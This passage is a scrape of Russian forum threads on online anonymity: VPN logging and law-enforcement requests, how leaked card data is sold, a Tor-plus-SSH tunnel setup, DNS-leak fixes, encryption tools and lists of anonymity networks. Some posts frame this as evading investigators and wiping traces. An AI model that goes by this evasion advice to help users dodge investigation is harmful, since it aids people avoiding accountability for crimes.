Желательно с выбором временного интервала аренды (день, неделя, месяц).

Openvpn не запускается через whonix

ID: 676533bbb4103b69df371d72
Thread ID: 27741
Created: 2019-02-07T19:17:25+0000
Last Post: 2019-02-08T15:33:05+0000
Author: toor43
Replies: 2 Views: 1K

Взял два vps один российский второй польский, поднял через скрипт Openvpn, на хостовой машине запускается и на виндовс и на ubuntu , а вот пробую запустить через whonix на виндовс и ubuntu , Openvpn не запускается, в чём может быть проблема? Сейчас пользуюсь nordvpn через whonix всё работает.

VPN-провайдеры и логи. Работа с запросами правоохранительных органов.

ID: 676533bbb4103b69df371d77
Thread ID: 27459
Created: 2019-01-24T20:34:29+0000
Last Post: 2019-01-24T20:34:29+0000
Author: tabac
Replies: 0 Views: 1K

VPN-провайдеры и логи. Работа с запросами правоохранительных органов.

Что за страшное слово «логи», которое в воображении некоторых пользователей олицетворяет самое страшное для их анонимности, что только может быть? Врут ли сервисы, которые убеждают, что именно их VPN не ведет логи? Обо всем этом я расскажу в статье, но сразу предупреждаю: это моя точка зрения, а я, как и все смертные, могу ошибаться.

Большинство страхов, связанных у пользователей с логами VPN, основано на мифах, а большинство обещаний VPN-сервисов не вести логи - на лжи. Логи логам рознь, не все из них включают информацию о пользователях. Например, на VPN- сервере должны быть включены логи об ошибках. Если с сервером что-либо случится, администратор должен изучить логи, чтобы понять причину проблем, это может быть взлом с целью атаки на клиентов сервиса, и в интересах пользователей, чтобы эти логи были включены.

С другой стороны, некоторые пользователи полагают, что наличие логов на VPN- серверах означает, что владельцы VPN-серверов сохраняют все их переписки, логины, пароли – это миф. Логи предполагают лишь сохранение информации когда/кто/куда. Например, дата и время, IP-адрес пользователя, IP-адрес сервера сайта, к которому он подключался через VPN, – это логи. Получение паролей, переписок, авторизационных данных предполагает перехват трафика в совокупности с подменой HTTPS – и это уже преступная деятельность.

Зачем VPN-сервису логи активности пользователей?

Основная причина – возможность контролировать исполнение правил сервиса и не позволять клиентам систематически наносить вред серверам. Например, если вы начнете использовать VPN без логов и делать «нехорошие дела», которые будут приводить к проблемам у VPN-провайдера, он никак не сможет вас вычислить и заблокировать.

Вторая причина – отведение удара. В случае проблем с правоохранительными органами VPN-провайдер заинтересован указать на подлинного виновника, не принимая удар на себя, ведь формально владелец VPN арендует сервера и несет ответственность за все действия, совершаемые с полученных им IP-адресов.

Вспомните историю хакера Коди Кретсингера, взломавшего сайт Sony Pictures. Стирая следы, он уничтожил свой жесткий диск, но используемый им популярный VPN-провайдер HideMyAss!, по информации СМИ, выдал все его данные ФБР. Позже российский ресурс «Лента.ру» обратился к представителю HideMyAss! и получил комментарий: «Все VPN-сервисы хранят сведения о тех, кто ими пользуется. Те, кто утверждает, что не делает этого, просто врут».

Выглядит это примерно так: ФБР обращается к VPN-провайдеру и говорит, что такого-то числа с такого-то IP-адреса, принадлежащего серверу вашего сервиса, было совершено противоправное действие. Нам нужна информация о том, кто в тот момент подключался к VPN-серверу и посещал такой-то ресурс.

Владелец VPN может отказаться от выдачи данных, но это верный путь заработать проблемы, например арест серверов, и, как следствие, конфликт с хостинг- провайдером, у которого сервера арендуются, или блокировку сайта (как это бывает в России). Все это – потери для бизнеса.

Кроме этого, правоохранительные органы и спецслужбы могут получить информацию и через хостинг-провайдера, где VPN-провайдер арендует сервера. Хостинг- провайдеры ведут свой лог и также могут предоставить сведения по запросу. Эта информация не такая полная и адресная, какой обладает VPN-провайдер, однако и с ней можно успешно работать. Например, хостинг-провайдер наверняка имеет список всех подключений к серверу в определенный промежуток времени.

Владельцы VPN-сервисов – это не революционеры, идущие на смерть за идеи свободы и равенства, это коммерсанты, главная цель которых – зарабатывать деньги. Они не продают вам анонимность и безопасность, они продают вам иллюзию анонимности и безопасности. Естественно, они, за очень редким исключением, выдадут данные по первому запросу.

И иногда этим пользуются злоумышленники, чтобы установить личность жертвы, скрывающуюся за VPN. Они отправляют VPN-провайдерам запросы, маскируя их под официальные запросы правоохранительных органов. Убедительно предупреждая о последствиях отказа, они нередко добиваются успеха, я сам сталкивался с подобными случаями.

VPN-провайдеры должны в своей политике конфиденциальности описывать всю собираемую информацию, срок хранения и порядок ее выдачи. Однако пользователь, не имея доступа к серверу, все равно не сможет проверить наличие или отсутствие сбора тех или иных данных и уж тем более порядок их обработки и хранения. А на сайте можно написать что угодно или попробовать уйти от ответа.

Вот пример такого ответа с сайта одного VPN-сервиса:

Есть еще один распространенный миф, применяемый VPN-провайдерами для рекламы, суть его в следующем: если одним VPN-сервером пользуется несколько клиентов, нет возможности выяснить, кто именно из них в определенный момент времени заходил на тот или иной сайт. Это миф, владельцу VPN нет никаких проблем определить это. Если бы это было не так, как бы VPN-сервис отсылал вам только те сайты, на которые зашли вы, а не все сайты, на которые зашли пользователи VPN в этот момент.

Подводя итог: VPN-провайдер может вести логи, собирая информацию о подключениях, для VPN-сервисов это вынужденная мера. VPN-провайдер может перехватывать и анализировать трафик, это уже преступная деятельность, которая может нанести немалый вред пользователям. Порядочные VPN-сервисы этим не занимаются.

Но есть еще информация, которую собирают и хранят VPN-сервисы: это ваши регистрационные данные, как правило email и платежные сведения, – то, чем вы оплачиваете услуги VPN. Например, это могут оказаться данные вашего аккаунта PayPal или банковской карты. Вся эта информация может быть использована для деанонимизации вас.

Я сталкивался с несколькими ответами VPN-провайдеров правоохранительным органам, и, что удивительно, ни один из них не содержал актуальный IP-адрес пользователя на момент применения VPN для совершения противоправных действий, зато все содержали различную информацию об аккаунте, включая email и IP-адрес при регистрации в сервисе. Предполагаю, основная причина этого – простота получения этих данных.

Стоит помнить, что, если вы приобретете подписку на услуги VPN-сервиса и передадите ее преступнику, с высокой вероятностью при запросе будут выданы ваши данные и никакой информации о том, кто реально использовал VPN в тот момент. Это может повлечь серьезные проблемы, потому не следует перепродавать ваш аккаунт неизвестным лицам в случае невостребованности услуги, это может в итоге вылиться в большие проблемы.

(c) cyberyozh

Не пользуйтесь сервисами онлайн-проверок при утечке персональных данных

ID: 676533bbb4103b69df371d7c
Thread ID: 27392
Created: 2019-01-20T21:22:52+0000
Last Post: 2019-01-20T21:22:52+0000
Author: tabac
Replies: 0 Views: 1K

К публикации поста побудила информация про очередные крупные утечки персональных данных в сети, хотел оставить просто комментарий, но в итоге пришел к выводу, что проблему стоит раскрыть чуть обширнее.

Все совпадения случайны, текст ниже просто плод бредового размышления уставшего от работы коня в вакууме и имеет цель повышения уровня информационной безопасности и гигиены среди пользователей в сети.

Не исключено, что публичные онлайн-сервисы для проверки подтверждения утечки данных имеют также цель повышения стоимости таких данных для вторичных продаж. Особенно если структура утекших данных не плоская, а прошедшая через агрегацию с другими целевыми источниками, т.е. нечто большее, чем email => password.

К примеру допустим, что существует результат агрегации утекших данных по различным базам:

Code:Copy to clipboard

{ "firstServiceName.com" : { "type" : "emailService", "properties" : { "email1@example.com" : "password1", "email2@example.com" : "password2" } }, "secondServiceName.com" : { "type" : "paymentsGate", "properties" : { "email" : "email2@example.com", "type" : "Visa", "fullName" : "Ivan Ivanov", "cardId" : "XXXX-XXXX-XXXX-XXXX" "cvc" : "12345", ... }, ... }

Далее можно сделать первичную оценку потенциальной стоимости данных для злонамеренных лиц. Очевидно, что стоимость данных secondServiceName.com потенциально выше, чем для firstServiceName.com. Далее формируется логика дальнейшей монетизации данных, обычно пути два.

Примитивный и безопасный. Из данных с малой стоимостью выбирается плоские данные типа "email1 => password1", формируется своеобразная прикормка. Далее эти плоские данные агрегируются в сборник и на непубличных специализированных сайтах публикуются "утечки". Если потенциальная стоимость теневых данных (secondServiceName.com, ...) большая и ограничена в сроке жизни (cvc, хэши от cvc для конкретных провайдеров), то публикации придается дополнительная "публичность", максимально возможная, в том числе может проводиться "рекламная" акция через социальные сети и прочие доступные инструменты.

Сложный и опасный. То же самое, что и в 1), только авторами/бенефициарами монетизации данных дополнительно создаются те самые сервисы проверки утечки данных. Это либо путь новичков, либо когда куш от потенциальной монетизации данных огромен.

Целевая аудитория довольно инертна и не будет заморачиваться поиском тех же торрентов с содержимым "утечки" данных, потому рано или поздно пользователи приходят на специализированные сайты для проверки утечки данных и далее производится запрос на проверку.

Если пользователь не нашел ничего, данные о его запросе на проверку собираются в отдельную базу. Этот пользователь живой. По сопоставлению дат начала кампании с публикацией и датой запроса можно оценить живость пользователя. Да, тот факт, что результат проверки был выдан пустым вовсе не означает, что его данные не находятся среди утекших.

Далее, если тип структурированных данных довольно ценен и содержит прямые и простые способы "монетизации" (см. данные secondServiceName.com), также если пользователь активен и проводил поиск, то дальнейшая вероятность монетизации данных снижается, т.к. могут быть сменены пароли, заблокированы карты и прочее. Бенефициары утечки такие данные быстро продают как отдельные базы тем же кардерам и прочим злоумышленникам по гипотетической цене X.

После прохождения определенного времени с момента организации утечки, формируется diff по данным, которые не были запрошены через проверки и далее либо сохраняются в архив для последующих агрегаций с новыми утечками, либо, если тип данных имеет способ длительной монетизации — такие данные частями также продаются, но по гипотетической цене 3X.

Поэтому, если вам действительно важна ваша безопасность, то имеет смысл не пользоваться популярными сервисами, компании-владельцы которых были ранее уличены в потере пользовательских данных. Либо совсем, либо максимально ограничить себя в распространении персональной информации. Если после оплаты товара на каких-либо сайтах вам приходит электронный чек, в URL которого встречаются переменные типа cvcHash, то имеет смысл не покупать через такие сервисы. Таких к счастью осталось мало и они представлены только в неблагополучных регионах планеты.

При возникновении глобальных утечек не рекомендуется использовать онлайн- сервисы проверок и как-либо проявлять активность через поисковики (google). Если вы довольно популярная и публичная персона, то теоретически можно через таргетированную рекламу (персонализированная атака) определить ваше желание произвести такую проверку.

При подозрении на утечку данных или же при массовых (громких в СМИ) публичных утечках, которые могут привести к потере ваших данных — необходимо сменить пароли на таких целевых сервисах, через https с визуальной проверкой информации в сертификате безопасности и без использования дополнительных сетевых уровней (tor/obfs и прочeе).

Мир технологий постоянно развивается, потенциальные способы причинить кому-то вред в сети также развиваются. Всегда следите за своей безопасностью в сети и не публикуйте ничего ценного, что могло бы привлечь внимание злоумышленников и в будущем вам навредить. Обязательно обучайте безопасному поведению в сети своих детей, близких и знакомых.

Источник: habr.com

Настройка браузера TOR

ID: 676533bbb4103b69df371d7d
Thread ID: 27331
Created: 2019-01-17T15:34:57+0000
Last Post: 2019-01-17T15:34:57+0000
Author: tabac
Replies: 0 Views: 1K

![](/proxy.php?image=https%3A%2F%2Fthesafety.us%2Fimages%2Farticles%2Ftor- logo.png&hash=a32d9a3d45dce15857a8ed18672883d6)
Нам понадобится рабочий SSH, TOR Browser и Double SSH Tunnel Manager

Первым делом настраиваем Double SSH Tunnel Manager

добавляем в программу SSH

формат строки login:password@IP:port или IP:port;login;password

добавили

adssh2.jpg
далее заходим в настройки программы и выставляем где надо галочки и меняем порты если оно нам надо.

после проделанных процедур программа должна принять такой вид.

теперь подключаемся к SSH через TOR. Ставим галочку напротив IP SSH и жмем "Запустить"

после подключения программа принимает такой вид.

Соединение состоит из звеньев 4 серверов. первые 3 это сервера TOR. последний на выходе это SSH сервер

при соединении у нас создался локальный Socks5 127.0.0.1:1080 его мы и будем использовать в дальнейшем.

далее...

- Скачиваем TOR browser, устанавливаем, либо используем уже имеющийся у нас.

теперь в Tor browser нужно отключить использование родного Socks5TOR и для того чтобы переключить на Socks_SSH

пишем строку about:addons

заходим и отключаем TorLauncher

пишем строку about:config

находим строку

browser.startup.homepage;aboutor

меняем на

browser.startup.homepage;about:home

находим значение

extensions.torbutton.test_enabled;true

меняем

extensions.torbutton.test_enabled;false

перезагружаем Tor browser

на этом все. этими действиями мы отключились от родного торовского Socks5 который идет в комплекте с программой.

теперь в настройках нужно прописать нужный нам Socks5 от Double SSH Tunnel Manager

Запускаем и пишем строку about:preferences#advanced

заходим в меню СЕТЬ -> НАСТРОИТЬ

прописываем вместо 9150 порт 1080.

для удобства запуска Tor browser добавляем ярлык программы в панель файрвола Double SSH Tunnel Manager

Теперь все настроено. остается проверить как оно работает.

Заходим на сайт https://whoer.net/ видим на выходе IP SSH сервера.

Теперь проверим как работает .onion ведь все мы знаем что в .onion попасть можно только из TOR сети.

Все работает так как Double SSH Tunnel Manager может перенаправлять .onion запросы в Tor.

Достаточно добавить свой SSH и пользоваться ею. Настраивать самому ничего не придется. Программа портативна.

Tor browser может также обновляться при выходе новой версии и настройки сброшены при этом не будут.

Всем удобного и безопасного серфинга.

Bonus:

5 программ для шифрования жестких дисков и файлов в Windows 10

ID: 676533bbb4103b69df371d85
Thread ID: 27129
Created: 2019-01-04T11:58:47+0000
Last Post: 2019-01-04T11:58:47+0000
Author: Hide
Replies: 0 Views: 1K

Шифрование — это мощный способ защитить ваши файлы и данные от несанкционированного доступа.
1.AxCrypt

AxCrypt — это инструмент с открытым исходным кодом для Windows, который поддерживает только 128-битное шифрование AES.
2.VeraCrypt

VeraCrypt имеет расширенные функции безопасности, поддерживает AES 256 бит, шифры шифрования Serpent и алгоритмы Two Fish.
3.DiskCryptor

DiskCryptor — это инструмент с открытым исходным кодом для шифрования, который используется для блокировки разделов диска, а также системных разделов. Поддерживает алгоритмы AES-256, Serpent и Twofish.
4.LaCie Private-Public
![](/proxy.php?image=https%3A%2F%2Fpp.userapi.com%2Fc850720%2Fv850720082%2F7c476%2FB- BXLfN7m_s.jpg&hash=77da8bc8e0b8b2cfaf195d73fccec86d)
Lacie Private-public — программа с открытым исходным кодом. Поддерживает алгоритм шифрования AES-256.
5.Gpg4win
![](/proxy.php?image=https%3A%2F%2Fpp.userapi.com%2Fc850720%2Fv850720082%2F7c47e%2FSS5iuW- LPyE.jpg&hash=f1bf8b9fcb0c4aefa2b03c95b056fc2f)
Gpg4win — используется для защиты ваших файлов и безопасной передачи ваших писем. Поддерживает все криптографические стандарты, такие как Open PGP и S / MIME (X.509).
Gpg4win содержит несколько бесплатных программных компонентов:

GnuPG — Бэкэнд; это фактический инструмент шифрования.

Kleopatra — диспетчер сертификатов для OpenPGP и X.509 (S / MIME) и общих криптографических диалогов.

GpgOL — плагин для Microsoft Outlook – поддерживает MS Exchange Server.

GpgEX — плагин для Microsoft Explorer (шифрование файлов).

GPA — альтернативный менеджер сертификатов для OpenPGP и X.509 (S / MIME).

Анонимный Хром - Ungoogled-Chromium

ID: 676533bbb4103b69df371d87
Thread ID: 27121
Created: 2019-01-03T12:37:21+0000
Last Post: 2019-01-03T12:37:21+0000
Author: tabac
Replies: 0 Views: 1K

Почему лучше не использовать Google Chrome

Ранее мы писали о том, почему google это не корпорация добра, от слова совсем. А что насчет их браузера chrome? Не секрет, что он сливает буквально все, что вы делаете на сервера google, а некоторые его части вообще проприетарные. Есть конечно опенсоус хромиум, но большинство основных разработчиков хромиума являются сотрудниками Google, и доверять ему тоже не стоит.

![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2FCHEF- KOCH%2FChromium- hardening%2Fmaster%2FWikipedia%2FPrivacy%2520concerns.png&hash=36554ec009e2d401f1c0a53d0f1abc3b)

![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2FCHEF- KOCH%2FChromium- hardening%2Fmaster%2FWikipedia%2FBotnet.png&hash=9bfd29bd88872b97948104cfedc96642)

В результате появился проект ungoogled-chromium, ориентированный на приватность и открытость. С технической точки зрения, ungoogled-chromium представляет собой набор конфигураций и исправлений тех частей браузера, которые взаимодействуют с Google или нарушают конфиденциальность.

Скачать ungoogled-chromium : <https://github.com/Eloston/ungoogled- chromium>

Что такое утечка DNS leak и как устранить

ID: 676533bbb4103b69df371d8b
Thread ID: 26874
Created: 2018-12-13T15:17:35+0000
Last Post: 2018-12-13T15:17:35+0000
Author: tabac
Replies: 0 Views: 1K

Что такое утечка DNS leak и как устранить

При подключении к VPN серверу в некоторых ОС (например, Windows) не всегда запросы проходят через DNS сервер VPN подключения. В этом случае некоторые сайты могут узнать, что ваш IP адрес и DNS сервера находятся в разных странах, и ваша анонимность может оказаться под угрозой.

Что такое DNS сервер
Основное предназначение DNS серверов - это преобразование доменных имен сайтов в IP адреса, за которыми эти домены закреплены. Простыми словами, вводя в браузере домен Google.com, DNS сервер смотрит за каким IP адресом закреплен данный домен, и загрузка страницы сайта происходит через IP адреса.

Ниже представлен пример определения DNS серверов на сайте Whoer.net.

Из примера видно, что мы подключились к VPN и скрыли свой IP адрес (IP принадлежит Великобритании), но при этом DNS сервер выдает наше реальное местонахождение (США).

В данном случае, проблема лежит в принципе работы DNS службы Windows. При подключении к VPN по-умолчанию запрос посылается на DNS VPN сервера. Затем DNS служба Windows ждет 2 секунды, и если ответ не пришел, то посылает запрос на следующий DNS сервер, находящийся в списке ОС Windows. Как раз следующие DNS сервера и принадлежат вашему Интернет-провайдеру, но имеют меньший приоритет по сравнению с DNS VPN сервера.

DNS VPN сервера может не успевать отвечать на запрос вовремя из-за географической удаленности VPN сервера от вас, в то время как DNS сервер вашего провайдера располагается в вашем городе. Также на это может влиять качество прохождения сигнала от вашего Интернет-провайдера до VPN сервера.

Решение: принудительно использовать нужный нам DNS сервер. В этом случае мы однозначно укажем операционной системе, что нужно использовать только указанные DNS сервера и тогда в списке DNS службы Windows не будут значиться DNS сервера вашего реального провайдера.

Как скрыть свой реальный DNS в Windows

Выполните следующие действия в любой версии Windows.
1

2

3

4

5
Кликните правой кнопкой мышки на сетевое подключение Windows и затем выберите "Свойства".
6

Укажите публичные DNS сервера Google или OpenDNS.

Google DNS:
- 8.8.8.8
- 8.8.4.4

OpenDNS:
- 208.67.222.222
- 208.67.220.220

Эти DNS сервера чаще всего определяются как США. В этом случае ни один сайт не будет выдавать ваши реальные DNS.

Для полной анонимности мы рекомендуем использовать наши DNS сервера. В разделе "Мой аккаунт" указаны DNS сервера для каждого VPN направления. И уже в этом случае ваш DNS сервер будет всегда соответствовать вашему IP адресу (по стране).

После выполнения указанных действий, ваш реальный DNS сервер в Windows будет скрыт.

Как скрыть свой реальный DNS на Ubuntu

Для устранения DNS leak в операционной системе Ubuntu на базе Linux, откройте раздел Соединения.

Выберите ваше подключение к Интернету и нажмите Изменить.

Выберите:

* Вкладку Параметры IPv4 * Автоматически (DHCP, только адрес) * Укажите DNS сервер. Например, можно использовать публичные DNS сервера от Google или OpenDNS

Google DNS:
- 8.8.8.8
- 8.8.4.4

OpenDNS:
- 208.67.222.222
- 208.67.220.220

В Linux необходимо перезапустить настройки сети, чтобы изменения вступили в силу.

Нажмите на Управление сетью.

Появится сообщение Соединение разорвано.

Затем нажмите на Управлению сетью еще раз, чтобы включить соединение.

После этих действий, ваш реальный DNS сервер будет скрыт.

Как скрыть свой реальный DNS на серверной Linux

Следующие действия выполняйте только в том случае, если вы считаете себя опытным пользователем Linux. Мы предупреждаем, что вносить изменения ручным способом опасно, если у вас мало знаний по администрированию Linux. Внимание: мы снимаем с себя ответственность за последствия.

Зайдите на сервер под root пользователем (или под обычным пользователем, но у вас должны быть привилегии исполнять команды под sudo).

Введите следующую команду. Возможно понадобится ввести пароль от учетной записи ОС. Для редактирования используется текстовый редактор nano. Если он у вас не установлен, то сделайте изменения другим редактором или установите nano.

sudo nano /etc/resolv.conf

* Если у вас установлен resolvconf, то в этом файле будет сообщение, что после перезагрузки ОС все изменения в этом файле будут утеряны и настройки вернутся по умолчанию на 127.0.1.1. Так как мы меняем DNS сервер временно, то нас это устраивает. * Запишите DNS сервер, указанный по умолчанию в этом файле. Затем измените DNS сервер. Например, можно взять DNS сервер от Google или OpenDNS.

Google DNS:
- 8.8.8.8
- 8.8.4.4

OpenDNS:
- 208.67.222.222
- 208.67.220.220

Для сохранения в редакторе nano нажмите:

* Ctrl+X для выхода из редактора * клавишу Y для сохранения изменений в файле * клавишу Enter для подтверждения сохранения в тот же файл

Чтобы изменения вступили в силу, необходимо перезагрузить сетевой интерфейс.

для Debian и Ubuntu введите команду:

sudo /etc/init.d/networking restart
для CentOS и Red Hat Linux введите команду:

sudo /etc/init.d/network restart
Сетевой интерфейс перезагрузится и DNS leak будет устранена.

Перезагрузите компьютер, чтобы вернуть исходный DNS сервер.

(c) madik

открываем аську по новой

ID: 676533bbb4103b69df371d91
Thread ID: 26758
Created: 2018-12-06T12:08:23+0000
Last Post: 2018-12-06T12:08:23+0000
Author: xrahitel
Replies: 0 Views: 1K

Переходим[accountkiller.com](https://www.accountkiller.com/en/delete-icq- account)

p.s Потом можно регаться на тот-же номер новую,думаю полезно когда надо логи все почистить

АННОНИСТНОСТЬ, тьфу - анонимное общение!

ID: 676533bbb4103b69df371d93
Thread ID: 26726
Created: 2018-12-03T15:22:18+0000
Last Post: 2018-12-03T15:22:18+0000
Author: tabac
Replies: 0 Views: 1K

Со временем, со стороны правительства все чаще наблюдается желание контролировать интернет трафик, каждого человека. У людей все больше появляется потребность в анонимном общении. В связи с тотальной прослушкой интернет-каналов и прозрачностью коммерческих интернет-компаний перед государственными органами сейчас встал вопрос о мерах противодействия. Я собрал для вас список доступных способов анонимизации . Использовать на свой страх и риск.

AnoNet — децентрализованная сеть между друзьями с использованием VPN и программных BGP-маршрутизаторов. http://wiki.ucis.nl/Anonet

BitPhone — мобильное коммуникационное устройство, работающее на базе децентрализованной сети в стиле Bitcoin. https://bitphone.net/

BitMessage — коммуникационный протокол P2P, используемый для обмена зашифрованными сообщениями от одного пользователя ко многим подписчикам.https://bitmessage.org/wiki/Main_Page

Commotion Wireless open source коммуникационный инструмент, работающий на мобильных телефонах, компьютерах и других беспроводных устройствах для создания децентрализованных mesh-сетей. https://commotionwireless.net

Cryptosphere — распределенное зашифрованное облачное хранилище на базе модели данных Git. https://github.com/cryptosphere/cryptosphere

Drogulus (WIP) — программируемое P2P-хранилище данных с поддержкой криптографии.http://drogul.us

Сеть eDonkey — файлообменная децентрализованная сеть для обмена большими файлами.http://en.wikipedia.org/wiki/EDonkey_network

Freenet — свободное программное обеспечения для анонимного обмена файлами, публикации сайтов (доступны только через Freenet), чатов и форумов. https://freenetproject.org

Freifunk — некоммерческая инициатива по созданию свободной децентрализованной mesh-сети. Прошивки Freifunk основаны на OpenWRT и OLSR или B.A.T.M.A.N.http://wiki.freifunk.net/Kategorie:English

GNUnet — фреймворк для безопасных peer-to-peer коммуникаций без использования центральных или промежуточных серверов. https://gnunet.org

Grimwire — браузерное приложение, которое использует Web Workers для изоляции процессов и WebRTC для peer-to-peer коммуникаций. https://github.com/pfraze/grimwire

Guifi — европейская (преимущественно, испанская) большая mesh-сеть с более чем 22000 активными узлами WiFi и 25 км оптоволокна. http://guifi.net

Читать также: Программы для восстановления данных

Hyperboria — ставит целью создание устойчивого децентрализованного альтернативного интернета. https://hyperboria.net

I2P — анонимизирующая сеть, использующая несколько уровней шифрования.https://geti2p.net/ru

Kademlia — распределенная хэш-таблица для P2P-сетей. http://en.wikipedia.org/wiki/Kademlia

NameCoin — распределенная система DNS на технологии Bitcoin. http://namecoin.info

Nightweb — экспериментальное приложение для Android или ПК, которое позволяет публиковать контент и общаться через BitTorrent поверх I2P. https://sekao.net/nightweb

LibreVPN — виртуальная mesh-сеть с конфигурационными скриптами, позволяющими поднять собственный mesh-VPN. http://librevpn.org.ar

OpenNIC Project — открытый и демократичный альтернативный DNS- провайдер.http://www.opennicproject.org

Osiris — ПО для децентрализованного портала, управляемого и работающего по P2P.http://www.osiris-sps.org

PeerCDN — автоматически раздает статичные ресурсы на сайте (изображения, видео, файлы) через P2P-сеть, составленную из посетителей, который в данный момент находятся на сайте. https://peercdn.com

PeerCoin/PPCoin — первая криптовалюта, основанная на реализации одновременно систем proof-of-stake и proof-of-work. http://ppcoin.org

PeerServer — пиринговая клиент-серверная технология, с использованием WebRTC, где ваш браузер работает как сервер для других браузеров через пиринговые P2P-каналы WebRTC.http://www.peer-server.com

Phantom — система децентрализованной интернет- анонимности.https://code.google.com/p/phantom

Project Byzantium — Linux-дистрибутив с поддержкой беспроводных mesh- сетей, который обеспечит связь в случае стихийного бедствия или аварии интернет-провайдера. http://project-byzantium.org

Quick mesh project — прошивка на базе OpenWRT для создания mesh- сетей.http://qmp.cat/Home

RetroShare — open-source, децентрализованная коммуникационная платформа для чатов и обмена файлами. http://retroshare.sourceforge.net

Serval Project позволяет осуществлять звонки между мобильными телефонами без использования базовых станций. http://www.servalproject.org

Syndie — немецкая open-source система для поддержки распределенных форумов.http://syndie.i2p2.de

Tahoe-LAFS — свободная распределенная файловая система с дублированием информации.https://tahoe-lafs.org

Telehash — новый криптографический протокол на базе JSON, позволяющий быстро создавать защищенные P2P-приложения. http://telehash.org

[Читать также: Набор эксплойтов Neptune распространяет Monero- майнер](https://helpugroup.ru/nabor-eksplojtov-neptune-rasprostranyaet-monero- majner/)

FNF — организация Free Network Foundation для информационной поддержки в создании локальных беспроводных сетей. https://thefnf.org

Tonika — распределенная социальная сеть, в которой коммуникации осуществляются напрямую между друзьями. http://pdos.csail.mit.edu/~petar/5ttt.org

Tor — многоступенчатая сеть анонимайзеров, браузер. https://www.torproject.org

Tox — проект, ставящий целью создать P2P-альтернативу Skype. https://tox.chat

Tribler — проект по созданию интернета, свободного от цензуры, развивается уже восемь лет. Торрент-клиент работающий через сеть Tor. http://www.tribler.org

Unhosted — бессерверные веб-приложения, которые исполняются в браузере клиента.https://unhosted.org

Vole — социальная сеть в браузере, без центрального сервера, использует Bittorrent, Go и Ember.js, а также Bittorrent Sync. http://vole.cc

ZeroNet — сеть распределённых децентрализованных веб-сайтов на основе Bitcoin.https://zeronet.io

ZeroTier One — open source приложение для создания огромных распределенных Ethernet-сетей. Используется end-to-end шифрование для всего трафика. Есть коммерческая и бесплатная версия. https://www.zerotier.com

Разбираемся, как мобильные операторы хранят и обрабатывают данные

ID: 676533bbb4103b69df371d94
Thread ID: 26720
Created: 2018-12-03T13:17:31+0000
Last Post: 2018-12-03T13:17:31+0000
Author: tabac
Replies: 0 Views: 1K

Разбираемся, как мобильные операторы хранят и обрабатывают данные

Мобильные операторы получают массу данных и метаданных, по которым можно узнать очень многое о жизни отдельно взятого абонента. А поняв, как обрабатываются и как хранятся эти данные, ты сможешь отследить всю цепочку прохождения информации от звонка до списания денег. Если же говорить о модели внутреннего нарушителя, то здесь возможности и подавно огромные, ведь защита данных вообще не входит в задачи систем предбиллинга.
Для начала нужно учитывать, что абонентский трафик в сети телеком-оператора генерируется и поступает с разного оборудования. Это оборудование может формировать файлы с записями (файлы CDR, логи RADIUS, текст в ASCII) и работать по разным протоколам (NetFlow, SNMP, SOAP). И нужно контролировать весь этот веселый и недружный хоровод, снимать данные, обрабатывать и передавать дальше в биллинговую систему в формате, который будет предварительно стандартизован.

При этом везде бегают абонентские данные, доступ к которым желательно не предоставлять посторонним. Насколько защищена информация в такой системе с учетом всех цепочек? Давай разбираться.

Зачем предбиллинг телеком-операторам?
Считается, что абоненты хотят получать все более новые и современные виды услуг, но нельзя постоянно менять для этого оборудование. Поэтому реализацией новых услуг и способами их предоставления должен заниматься предбиллинг — это его первая задача. Вторая — анализ трафика, проверка его корректности, полноты загрузки в абонентский биллинг, подготовка данных для биллинга.

С помощью предбиллинга реализованы различные сверки и дозагрузки данных. Например, сверка состояния услуг на оборудовании и в биллинге. Бывает, абонент пользуется услугами при том, что в биллинге он уже заблокирован. Либо он пользовался услугами, но с оборудования не поступили записи об этом. Ситуаций может быть множество, большинство таких моментов и решается с помощью предбиллинга.

Когда-то я писал курсовую работу по оптимизации бизнес-процессов компании и расчету ROI. Проблема с расчетом ROI была не в том, что не было исходных данных, — я не понимал, какой «линейкой» их мерить. Примерно так же часто бывает с предбиллингом. Можно бесконечно настраивать и улучшать обработку, но всегда в какой-то момент обстоятельства и данные сложатся так, что произойдет исключение. Можно идеально выстроить систему работы и мониторинга вспомогательных систем биллинга и предбиллинга, но невозможно обеспечить бесперебойную работу оборудования и каналов передачи данных.

Поэтому и существует дублирующая система, которая занимается проверкой данных в биллинге и данных, ушедших от предбиллинга в биллинг. Ее задача — поймать то, что ушло с оборудования, но по какой-то причине «не легло на абонента». Эту роль дублирующей и контролирующей предбиллинг системы обычно играет FMS — Fraud Management System. Конечно, ее основное предназначение — вовсе не контроль предбиллинга, а выявление мошеннических схем и, как следствие, мониторинг потерь и расхождений данных с оборудования и биллинговых данных.

На самом деле вариантов использования предбиллинга очень много. Например, это может быть выполнение сверки между состоянием абонента на оборудовании и в CRM. Такая схема может выглядеть следующим образом.

С помощью предбиллинга по SOAP получаем данные с оборудования (HSS, VLR, HLR, AUC, EIR).

Преобразуем исходные RAW-данные в нужный формат.

Делаем запрос в смежные системы CRM (базы данных, программные интерфейсы).

Производим сверку данных.

Формируем записи-исключения.

Делаем запрос в систему CRM на синхронизацию данных.

Итог — абонент, качающий фильм в роуминге в ЮАР, блокируется с нулевым балансом и не уходит в дикий минус.

Еще один пример использования — накопление данных и дальнейшая их обработка. Такой вариант возможен, когда у нас тысячи записей с оборудования (GGSN-SGSN, телефония): выбрасывать все эти записи в детализацию абонента — полнейшее безумие, не говоря уже о том, что мы адски нагружаем все системы таким количеством мелких данных. По этой причине подойдет следующая схема, которая разрешает проблему.

Получение данных с оборудования.

Агрегация данных на предбиллинге (ждем, когда соберутся все нужные записи по какому-либо условию).

Отправка данных в конечный биллинг.

Итог — вместо 10 тысяч записей мы отправили одну с агрегирующим значением счетчика потребленного интернет-трафика. Сделали всего один запрос к базе данных и сэкономили кучу ресурсов, включая электричество!

Это всего лишь типовые схемы работы. Формат статьи не позволяет привести примеры более сложных схем (например, Big Data), но они тоже встречаются.

Как усмирить зоопарк?
Чтобы было понятнее, как это работает и где здесь могут возникнуть проблемы, давай возьмем систему предбиллинга Hewlett-Packard Internet Usage Manager (HP IUM, в обновленном варианте eIUM) и на ее примере посмотрим, как работает подобный софт.

